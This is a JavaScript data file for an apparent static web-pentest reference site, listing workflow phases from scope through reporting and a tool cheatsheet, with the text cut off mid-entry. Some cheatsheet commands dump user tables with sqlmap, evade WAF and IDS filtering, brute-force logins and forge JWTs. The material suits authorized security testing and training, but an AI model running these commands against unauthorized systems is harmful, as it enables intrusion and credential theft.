/* ============================================================
   Reference content: phases, reference items, tool commands.
   {target} is rendered as a generic placeholder domain — this
   site is a static reference, not a live scanning tool.
   ============================================================ */

const ICONS = {
  overview: '<path d="M3 11.5 12 4l9 7.5"/><path d="M5 10v9a1 1 0 0 0 1 1h4v-6h4v6h4a1 1 0 0 0 1-1v-9"/>',
  scope: '<rect x="6" y="4" width="12" height="17" rx="2"/><rect x="9" y="2.5" width="6" height="3" rx="1"/><path d="M9 11h6M9 15h6M9 19h3"/>',
  recon: '<circle cx="10.5" cy="10.5" r="6.5"/><path d="m20 20-4.8-4.8"/><path d="M10.5 7.5v3l2 2"/>',
  scanning: '<circle cx="12" cy="12" r="9"/><circle cx="12" cy="12" r="5"/><circle cx="12" cy="12" r="1"/><path d="M12 3v3M21 12h-3M12 21v-3M3 12h3"/>',
  vuln: '<path d="M12 3 4.5 6v6c0 4.4 3.2 7.6 7.5 9 4.3-1.4 7.5-4.6 7.5-9V6L12 3Z"/><path d="M12 8v5"/><circle cx="12" cy="15.8" r=".9" fill="currentColor" stroke="none"/>',
  exploit: '<circle cx="12" cy="12" r="8"/><path d="M12 3v3M12 18v3M3 12h3M18 12h3"/><circle cx="12" cy="12" r="2"/>',
  post: '<path d="m12 3 9 4.5-9 4.5-9-4.5 9-4.5Z"/><path d="m3 12 9 4.5 9-4.5"/><path d="m3 16.5 9 4.5 9-4.5"/>',
  reporting: '<path d="M7 3h8l4 4v14a1 1 0 0 1-1 1H7a1 1 0 0 1-1-1V4a1 1 0 0 1 1-1Z"/><path d="M15 3v4h4"/><path d="M8.5 12.5h7M8.5 15.5h7M8.5 18h4"/>',
  cheatsheet: '<rect x="3" y="4" width="18" height="16" rx="2"/><path d="m7 9 3 3-3 3"/><path d="M13 15h4"/>',
  payloads: '<path d="m8 4-6 8 6 8"/><path d="m16 4 6 8-6 8"/><path d="M13 3 11 21"/>',
  github: '<path d="M12 3a9 9 0 0 0-2.85 17.54c.45.08.62-.2.62-.43v-1.5c-2.53.55-3.06-1.2-3.06-1.2-.41-1.05-1.01-1.33-1.01-1.33-.83-.56.06-.55.06-.55.91.06 1.39.94 1.39.94.81 1.38 2.12.98 2.64.75.08-.59.32-.98.58-1.21-2.02-.23-4.15-1.01-4.15-4.5 0-1 .35-1.81.94-2.45-.1-.23-.41-1.15.09-2.4 0 0 .77-.25 2.5.94a8.6 8.6 0 0 1 4.56 0c1.73-1.19 2.5-.94 2.5-.94.5 1.25.19 2.17.09 2.4.59.64.94 1.45.94 2.45 0 3.5-2.13 4.27-4.16 4.5.33.29.62.85.62 1.71v2.54c0 .24.16.52.63.43A9 9 0 0 0 12 3Z"/>',
  osint: '<path d="M2 12s3.6-7 10-7 10 7 10 7-3.6 7-10 7-10-7-10-7Z"/><circle cx="12" cy="12" r="3"/>',
};

const WORKFLOW = [
  {
    id: 'scope',
    title: 'Scope & Rules of Engagement',
    subtitle: 'Lock down authorization before any traffic hits the target',
    icon: ICONS.scope,
    accent: '#818cf8',
    intro: 'No packet leaves your machine before this section is complete. Every reputable engagement starts with written authorization.',
    items: [
      { t: 'Obtain signed written authorization (pentest agreement / letter of engagement) naming you as tester', tags: ['legal'] },
      { t: 'Confirm in-scope domains, subdomains, IP ranges, and explicitly out-of-scope assets', tags: ['scope'] },
      { t: 'Agree on testing window, blackout periods, and rate-limit / throughput constraints', tags: ['scope'] },
      { t: 'Confirm prohibited techniques (e.g. no DoS, no social engineering, no physical access) unless separately authorized', tags: ['legal'] },
      { t: 'Exchange emergency contacts for both sides in case something breaks in production', tags: ['comms'] },
      { t: 'Clarify data handling, evidence storage, and report delivery / disclosure requirements', tags: ['legal'] },
      { t: 'Set up an isolated testing environment (dedicated VM, VPN, non-attributable test accounts)', tags: ['setup'] },
      { t: 'Check whether the target sits behind a third-party host/CDN/WAF that requires its own separate authorization (AWS, Cloudflare, etc.)', tags: ['legal'] },
      { t: 'Document assumptions and known constraints (load balancers, autoscaling, staging vs. prod parity) that could affect result reliability', tags: ['scope'] },
    ],
  },
  {
    id: 'recon',
    title: 'Reconnaissance',
    subtitle: 'Passive OSINT — gather information without touching the target directly',
    icon: ICONS.recon,
    accent: '#38bdf8',
    intro: 'Stay passive here. The goal is to map the attack surface using public sources before any active probing begins.',
    items: [
      { t: 'WHOIS lookup for registrar, name servers, and registration contacts', cmds: ['whois {target}'] },
      { t: 'Enumerate DNS records (A, AAAA, MX, TXT, NS, CNAME, SOA)', cmds: ['dig {target} ANY +noall +answer', 'nslookup -type=any {target}'] },
      { t: 'Passive subdomain enumeration via certificate transparency & aggregators', cmds: ['curl -s "https://crt.sh/?q=%25.{target}&output=json" | jq -r \'.[].name_value\' | sort -u', 'subfinder -d {target} -silent'] },
      { t: 'Review historical snapshots for old endpoints, leaked paths, or removed features', cmds: ['curl -s "http://web.archive.org/cdx/search/cdx?url={target}/*&output=text&fl=original&collapse=urlkey"'] },
      { t: 'Search-engine dorking for exposed files, panels, and error pages', cmds: ['site:{target} filetype:pdf | filetype:sql | filetype:log', 'site:{target} intitle:"index of"'] },
      { t: 'Fingerprint technology stack (CMS, framework, JS libraries, CDN, WAF)', cmds: ['whatweb {target}', 'wafw00f https://{target}'] },
      { t: 'Check TLS certificate transparency logs for related domains and expiry', cmds: ['openssl s_client -connect {target}:443 -servername {target} </dev/null 2>/dev/null | openssl x509 -noout -text'] },
      { t: 'Search public code repos (GitHub/GitLab) for leaked keys, configs, or internal references', tags: ['osint'] },
      { t: 'Check cloud storage exposure (S3/GCS/Azure blob buckets tied to the target)', tags: ['osint'] },
      { t: 'Review job postings, docs, and support pages for internal tool/tech-stack hints', tags: ['osint'] },
    ],
  },
  {
    id: 'scanning',
    title: 'Scanning & Enumeration',
    subtitle: 'Active discovery — map live hosts, services, and application surface',
    icon: ICONS.scanning,
    accent: '#22d3ee',
    intro: 'First active phase. Respect the agreed rate limits and testing window from the scope section.',
    items: [
      { t: 'Port scan the web host and identify exposed services & versions', cmds: ['nmap -sC -sV -p- --min-rate 1000 -oA scan_{target} {target}'] },
      { t: 'Grab HTTP response headers and banners for the web server / app server', cmds: ['curl -sI https://{target}'] },
      { t: 'Enumerate virtual hosts / additional hostnames on the same IP', cmds: ['ffuf -w subdomains.txt -H "Host: FUZZ.{target}" -u https://{target} -fs 0'] },
      { t: 'Directory & file brute-force for hidden paths, backups, and admin panels', cmds: ['gobuster dir -u https://{target} -w common.txt -x php,bak,zip -t 40', 'ffuf -u https://{target}/FUZZ -w raft-medium.txt'] },
      { t: 'Crawl and spider the full site map, noting every unique parameterized endpoint', tags: ['burp', 'zap'] },
      { t: 'Check for subdomain takeover on any dangling CNAME records found during recon', tags: ['dns'] },
      { t: 'Identify all authentication & session entry points (login, SSO, password reset, MFA)', tags: ['auth'] },
      { t: 'Discover API surface — REST routes, GraphQL endpoint/introspection, Swagger/OpenAPI docs', cmds: ['curl -s https://{target}/swagger.json', 'curl -s -X POST https://{target}/graphql -H "Content-Type: application/json" -d \'{"query":"{__schema{types{name}}}"}\''] },
      { t: 'Run CMS-specific enumeration if a CMS was fingerprinted (WordPress, Drupal, Joomla, etc.)', cmds: ['wpscan --url https://{target} --enumerate vp,vt,u'] },
      { t: 'Catalogue every input point: query params, form fields, headers, cookies, JSON bodies', tags: ['mapping'] },
    ],
  },
  {
    id: 'vuln',
    title: 'Vulnerability Analysis',
    subtitle: 'Systematic testing mapped to the OWASP Top 10 (2021)',
    icon: ICONS.vuln,
    accent: '#f59e0b',
    intro: 'Work through each OWASP category methodically. Confirm findings manually — don\'t rely solely on scanner output.',
    groups: [
      {
        code: 'A01',
        name: 'Broken Access Control',
        severity: 'critical',
        items: [
          { t: 'Test for IDOR by altering object/user IDs in requests across two test accounts' },
          { t: 'Attempt forced browsing to admin/privileged endpoints as a low-privilege user' },
          { t: 'Verify server-side enforcement of role/permission checks, not just UI hiding' },
        ],
      },
      {
        code: 'A02',
        name: 'Cryptographic Failures',
        severity: 'high',
        items: [
          { t: 'Scan TLS configuration for weak protocols, ciphers, and certificate issues', cmds: ['testssl.sh https://{target}'] },
          { t: 'Confirm sensitive data (passwords, tokens, PII) is never transmitted or stored in plaintext' },
          { t: 'Check for HSTS, secure cookie flags, and mixed-content over HTTP' },
        ],
      },
      {
        code: 'A03',
        name: 'Injection',
        severity: 'critical',
        items: [
          { t: 'Test all input points for SQL injection with authorized, non-destructive payloads', cmds: ['sqlmap -u "https://{target}/page?id=1" --batch --level=2 --risk=1'] },
          { t: 'Test for reflected, stored, and DOM-based XSS across every input/output sink', cmds: ['dalfox url https://{target}/page?q=FUZZ'] },
          { t: 'Test for OS command injection, template injection (SSTI), and XXE in file/XML uploads' },
        ],
      },
      {
        code: 'A04',
        name: 'Insecure Design',
        severity: 'medium',
        items: [
          { t: 'Review business logic flows for abusable assumptions (pricing, quotas, workflow order)' },
          { t: 'Check rate limiting / anti-automation on login, signup, password reset, and payment flows' },
        ],
      },
      {
        code: 'A05',
        name: 'Security Misconfiguration',
        severity: 'high',
        items: [
          { t: 'Look for default credentials, sample apps, and debug endpoints left enabled', cmds: ['nikto -h https://{target}'] },
          { t: 'Check for verbose error messages, stack traces, and directory listing exposure' },
          { t: 'Verify security headers: CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy' },
        ],
      },
      {
        code: 'A06',
        name: 'Vulnerable & Outdated Components',
        severity: 'medium',
        items: [
          { t: 'Enumerate JS libraries, CMS plugins, and server software versions for known CVEs', cmds: ['retire --crawl https://{target}'] },
          { t: 'Cross-reference identified versions against the NVD / vendor advisories' },
        ],
      },
      {
        code: 'A07',
        name: 'Identification & Authentication Failures',
        severity: 'high',
        items: [
          { t: 'Test password policy strength, credential stuffing resistance, and account lockout' },
          { t: 'Test session management: token entropy, fixation, expiry, and invalidation on logout' },
          { t: 'Verify MFA cannot be bypassed via response manipulation or missing server-side checks' },
        ],
      },
      {
        code: 'A08',
        name: 'Software & Data Integrity Failures',
        severity: 'medium',
        items: [
          { t: 'Check for insecure deserialization of user-controlled data' },
          { t: 'Verify CI/CD and update mechanisms validate integrity (signatures/checksums) of dependencies' },
        ],
      },
      {
        code: 'A09',
        name: 'Security Logging & Monitoring Failures',
        severity: 'low',
        items: [
          { t: 'Confirm authentication and access-control failures are logged with sufficient detail' },
          { t: 'Check whether suspicious activity (e.g. brute force, scanning) triggers alerting' },
        ],
      },
      {
        code: 'A10',
        name: 'Server-Side Request Forgery (SSRF)',
        severity: 'critical',
        items: [
          { t: 'Test any server-side URL fetcher (webhooks, imports, PDF generators) against internal/metadata addresses' },
          { t: 'Verify allow-listing and network egress controls on outbound server requests' },
        ],
      },
    ],
  },
  {
    id: 'exploit',
    title: 'Exploitation',
    subtitle: 'Prove impact — carefully, and only within agreed scope',
    icon: ICONS.exploit,
    accent: '#f43f5e',
    intro: 'Favor the least destructive proof possible. The goal is evidence of impact, not maximum damage.',
    items: [
      { t: 'Manually verify every scanner-flagged finding to rule out false positives' },
      { t: 'Build a minimal, non-destructive proof-of-concept for each confirmed vulnerability' },
      { t: 'Attempt to chain lower-severity findings into higher-impact scenarios' },
      { t: 'Test privilege escalation paths between user roles / tenants' },
      { t: 'Test session hijacking / token theft impact if a token can be captured' },
      { t: 'Exercise abusable business logic identified during vulnerability analysis' },
      { t: 'Capture clean evidence for every finding: request/response pairs, screenshots, timestamps' },
      { t: 'Stop and flag immediately anything indicating real user data exposure or production impact' },
    ],
  },
  {
    id: 'post',
    title: 'Post-Exploitation & Cleanup',
    subtitle: 'Assess blast radius, then leave the environment as you found it',
    icon: ICONS.post,
    accent: '#a78bfa',
    intro: 'Scoped strictly to the web application context — no lateral movement beyond what was authorized.',
    items: [
      { t: 'Assess data exposure impact: what could actually be read, modified, or deleted' },
      { t: 'Check for cross-tenant / multi-tenant data isolation failures if applicable' },
      { t: 'Document any persistence risk (e.g. webshell potential) without actually planting one unless authorized' },
      { t: 'Remove all test accounts, uploaded files, and injected test data created during the engagement' },
      { t: 'Verify no payload strings (XSS, SQLi, SSTI, etc.) remain stored in application data or logs after testing' },
      { t: 'Reset any application state or configuration changed for testing purposes' },
      { t: 'Confirm with the client that the environment matches its pre-engagement state' },
    ],
  },
  {
    id: 'reporting',
    title: 'Reporting',
    subtitle: 'Translate findings into something the client can act on',
    icon: ICONS.reporting,
    accent: '#34d399',
    intro: 'A finding nobody can reproduce or prioritize is a finding that never gets fixed.',
    items: [
      { t: 'Write an executive summary in business language: risk, impact, and priority — no jargon' },
      { t: 'Detail each technical finding with reproduction steps, evidence, and affected endpoints' },
      { t: 'Score each finding (e.g. CVSS) and assign a clear risk rating' },
      { t: 'Map findings back to the relevant OWASP Top 10 / CWE category' },
      { t: 'Provide concrete, actionable remediation guidance per finding, not generic advice' },
      { t: 'Include a retest / verification plan and timeline for fixes' },
      { t: 'Deliver the report over an encrypted/secure channel and confirm receipt' },
    ],
  },
];

/* ============================================================
   Cheatsheet: automated tool calls, grouped by tool.
   Categories used for filter chips: recon, scanning, vuln, injection, xss, tls, cms
   ============================================================ */

const CHEATSHEET = [
  {
    id: 'nikto',
    tool: 'Nikto',
    category: 'vuln',
    categoryLabel: 'Vuln Scan',
    desc: 'Web server scanner — flags dangerous files, outdated software, and common misconfigurations.',
    note: 'Tuning codes: 1 interesting files · 2 misconfig · 3 info disclosure · 4 injection · 5 remote file retrieval · 6 DoS · 7 remote file retrieval (in webroot) · 8 command execution · 9 SQL injection · a auth bypass · b software ID · c remote source inclusion · x reverse (exclude).',
    commands: [
      { label: 'Basic scan', cmd: 'nikto -h {target}', why: "Runs Nikto's full default check battery (6,700+ signatures) over HTTP — the fastest way to get a first-pass list of outdated software, dangerous files, and misconfigurations." },
      { label: 'Force HTTPS / SSL', cmd: 'nikto -h https://{target} -ssl', why: 'Forces the scan over TLS and tells Nikto to negotiate SSL directly instead of guessing from the URL scheme — needed when the site only responds correctly on 443.' },
      { label: 'Scan a specific port', cmd: 'nikto -h {target} -p 8443', why: 'Points Nikto at a non-standard port — e.g. an admin panel or dev instance you spotted on an alternate port during the Nmap scan.' },
      { label: 'Scan multiple ports', cmd: 'nikto -h {target} -p 80,443,8080', why: 'Runs the same check battery across every web-facing port in one pass instead of one scan per port.' },
      { label: 'Limit to specific checks (Tuning)', cmd: 'nikto -h {target} -Tuning 4,9b', why: 'Restricts the scan to specific categories (here: injection, SQL injection, software ID) for a faster, more targeted run instead of the full noisy sweep.' },
      { label: 'Save report as HTML', cmd: 'nikto -h {target} -o nikto_{target}.html -Format html', why: 'Writes a shareable HTML report instead of dumping everything to the terminal — useful for attaching raw scan evidence to your findings.' },
      { label: 'Route through a proxy (e.g. Burp)', cmd: 'nikto -h {target} -useproxy http://127.0.0.1:8080', why: "Routes every Nikto request through Burp/ZAP so you can see, replay, and correlate its traffic with the rest of your manual testing." },
      { label: 'Authenticate with HTTP Basic creds', cmd: 'nikto -h {target} -id admin:password', why: 'Supplies HTTP Basic credentials so Nikto can scan pages behind basic auth instead of just recording 401s.' },
      { label: 'Custom Host header (virtual host)', cmd: 'nikto -h {target} -vhost admin.{target}', why: 'Overrides the Host header so Nikto scans a specific virtual host on a shared IP, rather than whatever the server returns by default.' },
      { label: 'IDS evasion technique', cmd: 'nikto -h {target} -evasion 1', why: 'Applies a LibWhisker IDS-evasion encoding to requests — useful for confirming whether a WAF/IDS actually inspects payloads or just pattern-matches raw strings.' },
      { label: 'Scan a list of hosts', cmd: 'nikto -h hosts.txt', why: 'Batches Nikto across every host in a file in one run — handy once recon has produced a list of live subdomains.' },
      { label: 'Update plugin/database files', cmd: 'nikto -update', why: 'Pulls the latest plugin and vulnerability database before scanning — a stale Nikto misses recently disclosed issues.' },
    ],
  },
  {
    id: 'nmap',
    tool: 'Nmap',
    category: 'scanning',
    categoryLabel: 'Scanning',
    desc: 'Port scanner and service/version fingerprinter — the usual first active touch of a target.',
    commands: [
      { label: 'Quick scan (top 100 ports)', cmd: 'nmap -F {target}', why: 'Scans only the 100 most common ports — a fast sanity check before committing to a full sweep.' },
      { label: 'Full TCP port sweep', cmd: 'nmap -p- --min-rate 1000 {target}', why: "Scans all 65,535 TCP ports at a high packet rate so you don't miss a service on a non-standard port — a common place to find forgotten admin panels or staging services." },
      { label: 'Service/version + default scripts', cmd: 'nmap -sC -sV {target}', why: "Runs Nmap's default NSE scripts and version detection together — the standard first real look at what's actually running behind each open port." },
      { label: 'Aggressive vuln script scan', cmd: 'nmap -sV --script=vuln {target}', why: "Runs Nmap's vulnerability-detection script category against detected services, surfacing known CVEs tied to the fingerprinted versions." },
      { label: 'Top UDP ports', cmd: 'nmap -sU --top-ports 20 {target}', why: 'Web hosts rarely need a full UDP scan, but checking the top ports can reveal exposed DNS, SNMP, or NTP services that widen the attack surface.' },
      { label: 'Stealthier / rate-limited timing', cmd: 'nmap -sS -T2 -Pn {target}', why: 'Slows the scan and skips host-discovery pings — useful against rate-limited or IDS-protected targets where a loud scan could trip alerts or breach the agreed testing throughput.' },
      { label: 'Save output in all formats', cmd: 'nmap -oA scan_{target} -sC -sV {target}', why: "Saves results in Nmap's normal, XML, and grepable formats at once, so you can read them now and pipe them into other tooling later." },
    ],
  },
  {
    id: 'dirfuzz',
    tool: 'Gobuster / ffuf',
    category: 'scanning',
    categoryLabel: 'Scanning',
    desc: 'Directory, virtual-host, and parameter fuzzing against the live application.',
    commands: [
      { label: 'Directory brute force (gobuster)', cmd: 'gobuster dir -u https://{target} -w /usr/share/wordlists/dirb/common.txt -x php,bak,zip,txt -t 40', why: 'Brute-forces common directory and file names, appending known extensions, to surface hidden admin panels, backups, or leftover files.' },
      { label: 'Directory brute force (ffuf)', cmd: 'ffuf -u https://{target}/FUZZ -w raft-medium-directories.txt -mc 200,301,302,403', why: "Same goal as gobuster, but ffuf's match-code filtering (-mc) makes it easier to tune signal vs. noise on chattier targets." },
      { label: 'Virtual host discovery (ffuf)', cmd: 'ffuf -u https://{target} -H "Host: FUZZ.{target}" -w subdomains.txt -fs 0', why: "Fuzzes the Host header against a wordlist to find virtual hosts the server answers for but that aren't linked anywhere public — often staging or internal apps on the same IP." },
      { label: 'Virtual host discovery (gobuster)', cmd: 'gobuster vhost -u https://{target} -w subdomains.txt --append-domain', why: "Same vhost-discovery goal as the ffuf version, using Gobuster's dedicated vhost mode instead." },
      { label: 'GET parameter discovery', cmd: 'ffuf -u "https://{target}/page?FUZZ=test" -w params.txt -fs 0', why: 'Fuzzes the parameter name itself (not the value) to find undocumented query parameters an endpoint quietly accepts — often where extra functionality or debug flags live.' },
      { label: 'POST body / login fuzzing', cmd: 'ffuf -u https://{target}/login -X POST -d "user=admin&pass=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -w passwords.txt -fc 401', why: 'Fuzzes a POST body field while filtering out the known failure code, to brute-force credentials or spot a value that triggers a different (successful) response.' },
    ],
  },
  {
    id: 'sqlmap',
    tool: 'sqlmap',
    category: 'injection',
    categoryLabel: 'Injection',
    desc: 'Automated SQL injection detection and exploitation. Use only against parameters you\'re authorized to test.',
    commands: [
      { label: 'Test a GET parameter', cmd: 'sqlmap -u "https://{target}/page?id=1" --batch --level=2 --risk=1', why: "Runs sqlmap's standard, low-risk test suite against a URL parameter — non-interactive (--batch) and conservative enough not to risk damaging data." },
      { label: 'Test a POST login form', cmd: 'sqlmap -u "https://{target}/login" --data="user=a&pass=b" --batch', why: "Points sqlmap at a login form's POST body instead of a URL parameter, since injectable fields aren't always in the query string." },
      { label: 'Replay a saved Burp/ZAP request', cmd: 'sqlmap -r request.txt --batch --level=3', why: 'Feeds sqlmap a raw HTTP request captured from Burp/ZAP so it tests with the exact headers, cookies, and auth state you were using — far more reliable than reconstructing the request by hand.' },
      { label: 'Enumerate databases', cmd: 'sqlmap -u "https://{target}/page?id=1" --batch --dbs', why: 'Once injection is confirmed, lists every database the account can see — the first step in scoping what data is actually exposed.' },
      { label: 'Dump a specific table', cmd: 'sqlmap -u "https://{target}/page?id=1" --batch -D appdb -T users --dump', why: "Extracts the contents of a specific table once you've confirmed it exists — usually the credentials or user-data table you want as evidence." },
      { label: 'Attempt WAF/filter bypass with tamper scripts', cmd: 'sqlmap -u "https://{target}/page?id=1" --batch --tamper=space2comment,between', why: 'Rewrites the injected payload using tamper scripts (e.g. replacing spaces with comments) to slip past naive WAF pattern-matching.' },
    ],
  },
  {
    id: 'dalfox',
    tool: 'Dalfox',
    category: 'xss',
    categoryLabel: 'XSS',
    desc: 'Fast automated XSS scanning, single-URL or pipelined from other recon tools.',
    commands: [
      { label: 'Scan a single URL', cmd: 'dalfox url "https://{target}/page?q=FUZZ"', why: "Fuzzes a single parameter with Dalfox's built-in XSS payload set and reports which ones actually reflected or executed, instead of you testing each payload by hand." },
      { label: 'Scan a list of URLs from file', cmd: 'dalfox file urls.txt --skip-bav', why: 'Batches the same XSS scan across every URL in a file; --skip-bav skips the slower blind-XSS module when you only want the quick pass.' },
      { label: 'Pipe from recon tools', cmd: 'subfinder -d {target} -silent | httpx -silent | gau | dalfox pipe', why: "Chains recon output — subdomains, live hosts, mined URLs — straight into Dalfox so an entire target's URL surface gets tested for XSS in one pipeline." },
    ],
  },
  {
    id: 'nuclei',
    tool: 'Nuclei',
    category: 'vuln',
    categoryLabel: 'Vuln Scan',
    desc: 'Template-driven scanner for known CVEs, exposures, and misconfigurations at scale.',
    commands: [
      { label: 'Run high/critical CVE templates', cmd: 'nuclei -u https://{target} -t cves/ -severity critical,high', why: "Runs Nuclei's community-maintained CVE template pack, filtered to critical/high severity, for a fast check against thousands of publicly known vulnerabilities." },
      { label: 'Check exposures & misconfigurations', cmd: 'nuclei -u https://{target} -t exposures/ -t misconfiguration/', why: "Targets Nuclei's exposure and misconfiguration templates — things like exposed .env files, debug endpoints, and default configs that a generic scanner might miss." },
      { label: 'Scan a list of URLs', cmd: 'nuclei -l urls.txt -t technologies/ -c 50', why: 'Runs a specific template category across a whole list of URLs at 50 concurrent requests — useful once a recon pass has produced many live hosts.' },
      { label: 'Filter by tag and rate-limit requests', cmd: 'nuclei -u https://{target} -tags cve,exposure -rate-limit 20', why: 'Combines multiple template tags in one run while capping requests per second, so an aggressive scan stays inside an agreed rate-limit constraint.' },
      { label: 'Update templates before a run', cmd: 'nuclei -update-templates', why: "Nuclei's value comes entirely from its template library — pulling the latest templates before a run ensures you're checking against the newest disclosed issues." },
    ],
  },
  {
    id: 'tls',
    tool: 'testssl.sh / sslyze',
    category: 'tls',
    categoryLabel: 'TLS / SSL',
    desc: 'Transport-layer security assessment — protocol support, cipher strength, and known TLS CVEs.',
    commands: [
      { label: 'Full TLS assessment', cmd: 'testssl.sh https://{target}', why: "Runs the full protocol/cipher/certificate/vulnerability battery against the target's TLS stack — the standard first pass for OWASP A02 Cryptographic Failures." },
      { label: 'Check only known vulnerabilities', cmd: 'testssl.sh --vulnerable {target}:443', why: 'Skips the full cipher enumeration and only checks for known TLS vulnerabilities (Heartbleed, POODLE, etc.) — much faster when you just need a yes/no on known CVEs.' },
      { label: 'Check a single protocol version', cmd: 'testssl.sh --tls1 --tls1_1 {target}:443', why: 'Tests only for deprecated TLS 1.0/1.1 support — a quick, targeted check when you just need to confirm one specific finding.' },
      { label: 'Alternative scanner', cmd: 'sslyze --regular {target}', why: 'A faster, more scriptable alternative to testssl.sh when you want a second opinion or need structured output for automation.' },
    ],
  },
  {
    id: 'wpscan',
    tool: 'WPScan',
    category: 'cms',
    categoryLabel: 'CMS',
    desc: 'WordPress-specific enumeration and vulnerability scanning.',
    commands: [
      { label: 'Enumerate plugins, themes & users', cmd: 'wpscan --url https://{target} --enumerate vp,vt,u', why: "Enumerates vulnerable plugins, vulnerable themes, and usernames in one pass — the standard first look at a WordPress install's attack surface." },
      { label: 'Aggressive plugin detection', cmd: 'wpscan --url https://{target} --enumerate ap --plugins-detection aggressive', why: 'Trades scan time for accuracy — aggressive mode checks version strings against more detection methods, useful when passive detection misses plugins.' },
      { label: 'Credential check (authorized only)', cmd: 'wpscan --url https://{target} --usernames admin --passwords rockyou.txt', why: "Attempts a password-spray against discovered usernames — only ever run this with explicit authorization, since it's an active brute-force against a real login form." },
      { label: 'Use an API token for vulnerability data', cmd: 'wpscan --url https://{target} --api-token YOUR_TOKEN', why: "Unlocks WPScan's full vulnerability-database lookups (otherwise rate-limited) so plugin/theme findings actually resolve to known CVEs." },
    ],
  },
  {
    id: 'recon-auto',
    tool: 'Subfinder / httpx / Amass',
    category: 'recon',
    categoryLabel: 'Recon',
    desc: 'Automated passive subdomain enumeration piped into live-host and tech-stack detection.',
    commands: [
      { label: 'Subdomains → alive hosts', cmd: 'subfinder -d {target} -silent | httpx -sc -title -td', why: 'Passively enumerates subdomains, then immediately checks which are alive and grabs page titles — turns a raw name list into a prioritized target list.' },
      { label: 'Passive enumeration with Amass', cmd: 'amass enum -passive -d {target}', why: 'Pulls subdomains from a wider set of passive sources (certificate transparency, DNS aggregators) than subfinder alone, without sending any traffic to the target itself.' },
      { label: 'Active enumeration (brute force + intel)', cmd: 'amass enum -active -d {target} -brute', why: 'Adds active DNS brute-forcing and extra intel gathering on top of passive sources — noisier, but finds subdomains that never appear in any public dataset.' },
      { label: 'Bulk tech-stack fingerprinting', cmd: 'httpx -l subdomains.txt -tech-detect -status-code', why: "Runs technology detection and status-code checks across a whole subdomain list at once, so you know what's running before choosing which scans to run where." },
    ],
  },
  {
    id: 'fingerprint',
    tool: 'WhatWeb / wafw00f',
    category: 'recon',
    categoryLabel: 'Recon',
    desc: 'Quick technology and WAF fingerprinting before deciding which scans are worth running.',
    commands: [
      { label: 'Aggressive tech fingerprinting', cmd: 'whatweb -a 3 {target}', why: 'Aggression level 3 makes WhatWeb follow more links and try harder to positively identify the CMS/framework/JS libraries — worth the extra requests when passive fingerprinting is inconclusive.' },
      { label: 'WAF detection', cmd: 'wafw00f https://{target}', why: 'Identifies which WAF, if any, sits in front of the target — this changes how you tune payloads and rate limits for every scan that follows.' },
    ],
  },
  {
    id: 'urldiscovery',
    tool: 'Katana / gau / waybackurls',
    category: 'recon',
    categoryLabel: 'Recon',
    desc: 'Crawl the live site and mine archived sources for every URL and endpoint ever seen for the target.',
    commands: [
      { label: 'Active crawl with JS parsing', cmd: 'katana -u https://{target} -jc -d 3', why: 'Actively crawls the site — including JavaScript-rendered links (-jc) up to 3 levels deep — building a URL map that a basic HTML-only crawler would miss on a JS-heavy app.' },
      { label: 'Pull known URLs from public archives', cmd: 'gau {target} | tee urls_{target}.txt', why: 'Pulls every URL ever indexed for the domain from public archives (Wayback Machine, Common Crawl, AlienVault OTX) — often surfaces old, forgotten, or unlinked endpoints that still work.' },
      { label: 'Wayback Machine URLs only', cmd: 'waybackurls {target} | sort -u', why: 'A narrower version of the above that only queries the Wayback Machine — useful when you just want historical snapshots, not the full aggregator set.' },
      { label: 'Filter mined URLs down to likely params', cmd: 'gau {target} | grep "="', why: 'Cuts a large mined-URL list down to ones containing query parameters — the URLs most worth fuzzing for injection or IDOR.' },
    ],
  },
  {
    id: 'arjun',
    tool: 'Arjun',
    category: 'recon',
    categoryLabel: 'Recon',
    desc: 'Hidden HTTP parameter discovery — finds GET/POST/JSON params an endpoint silently accepts.',
    commands: [
      { label: 'Discover params on a single endpoint', cmd: 'arjun -u https://{target}/endpoint', why: 'Sends requests with hundreds of common parameter names to see which ones the endpoint actually reacts to — surfaces undocumented functionality that never appears in the visible UI.' },
      { label: 'Target a JSON POST body', cmd: 'arjun -u https://{target}/api -m JSON', why: 'Targets a JSON API body instead of query-string parameters, since many modern endpoints only ever accept parameters in the request body.' },
      { label: 'Scan a list of URLs', cmd: 'arjun -i urls_{target}.txt -t 10', why: 'Runs the same hidden-parameter discovery across every URL in a file in parallel, once recon has produced a broad endpoint list.' },
      { label: 'Increase accuracy on flaky endpoints', cmd: 'arjun -u https://{target}/search --stable', why: 'Trades speed for reliability on flaky or rate-limited endpoints, reducing false negatives caused by inconsistent responses.' },
    ],
  },
  {
    id: 'jwt',
    tool: 'jwt_tool',
    category: 'auth',
    categoryLabel: 'Auth / JWT',
    desc: 'Inspect, tamper, and attack JSON Web Tokens used for session or API authentication.',
    commands: [
      { label: 'Decode and inspect a token', cmd: 'jwt_tool <token>', why: 'Decodes the header and payload with no network calls — the first thing to check before deciding which JWT attacks are even worth attempting.' },
      { label: 'Interactive tamper playground', cmd: 'jwt_tool <token> -T', why: 'Opens an interactive editor for modifying claims (role, user ID, expiry) and re-signing or re-encoding the token, to test whether the server actually validates it server-side.' },
      { label: 'Test the classic alg=none bypass', cmd: 'jwt_tool <token> -X a', why: "Tests the classic vulnerability where a server accepts a token with its signature algorithm set to 'none', letting you forge arbitrary claims with no key at all." },
      { label: 'Crack a weak HMAC secret', cmd: 'jwt_tool <token> -C -d wordlist.txt', why: 'Brute-forces a weak HMAC signing secret against a wordlist — if it succeeds, you can forge valid tokens for any user.' },
      { label: 'Run every automated attack module', cmd: 'jwt_tool <token> -M at', why: "Runs jwt_tool's full automated attack playbook (alg confusion, none-alg, known exploits) in one pass instead of trying each attack manually." },
      { label: 'Sign a forged token with a known/guessed secret', cmd: 'jwt_tool <token> -S hs256 -p "guessed_secret"', why: 'Once you know or crack the signing secret, forges a brand-new token with whatever claims you want — the proof-of-concept step after cracking succeeds.' },
    ],
  },
  {
    id: 'corsy',
    tool: 'Corsy',
    category: 'misc',
    categoryLabel: 'Misc',
    desc: 'Automated CORS misconfiguration scanner — checks origin reflection, null-origin trust, and wildcard-with-credentials issues.',
    commands: [
      { label: 'Scan a single target', cmd: 'python3 corsy.py -u https://{target}', why: 'Sends a battery of crafted Origin headers and checks whether the server reflects them with Access-Control-Allow-Credentials: true — the signature of an exploitable CORS misconfiguration.' },
